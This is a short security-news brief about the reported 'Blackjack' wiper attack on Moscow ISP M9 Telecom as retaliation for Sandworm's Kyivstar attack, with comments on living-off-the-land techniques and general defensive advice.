Summary:
A group linked to Ukraine’s SBU has allegedly launched a destructive cyber-attack against a Moscow ISP in retaliation to Russia’s takedown of Kyivstar last month. According to reports, the group called “Blackjack” deleted 20 TBs of data at M9 Telecom, leaving some residents of Moscow without Internet service.

On the group’s Telegram channel, they messaged that the attack is “just a continuation of the series of warm-up acts of retaliation for the civilian Kyivstar before the grown-up boom.” While Blackjack operators claimed all the ISPs data and backups were deleted, M9 Telecom’s website appears to still be functioning.

Security Officer Comments:
The attack appears to be a response to a Russian operation carried out by the notorious state-backed Sandworm group which led to thousands of virtual servers and PCs being wiped from Ukraine’s largest mobile operators network. The attack carried out by Sandworm is claimed to be the most destructive attack since Russia’s invasion. Sandworm was able to dwell without discovery inside Kyivstar’s networks for months before the attack, Reuters claimed.

The Sandworm actors allegedly used living-off-the-land (LOTL) techniques to remain hidden. LOTL attacks are dangerous as they can be hard to detect as traffic from these tools is often expected and allowed by security defenses.

Suggested Corrections:
The article recommends awareness and monitoring of the usage of tools that may be used in LOTL attacks. Defending against known and unknown threats requires shared awareness, collaboration, transparent system knowledge and auditing, monitoring and user training.

Link(s):
https://www.infosecurity-magazine.com/news/ukrainian-blackjack-hackers/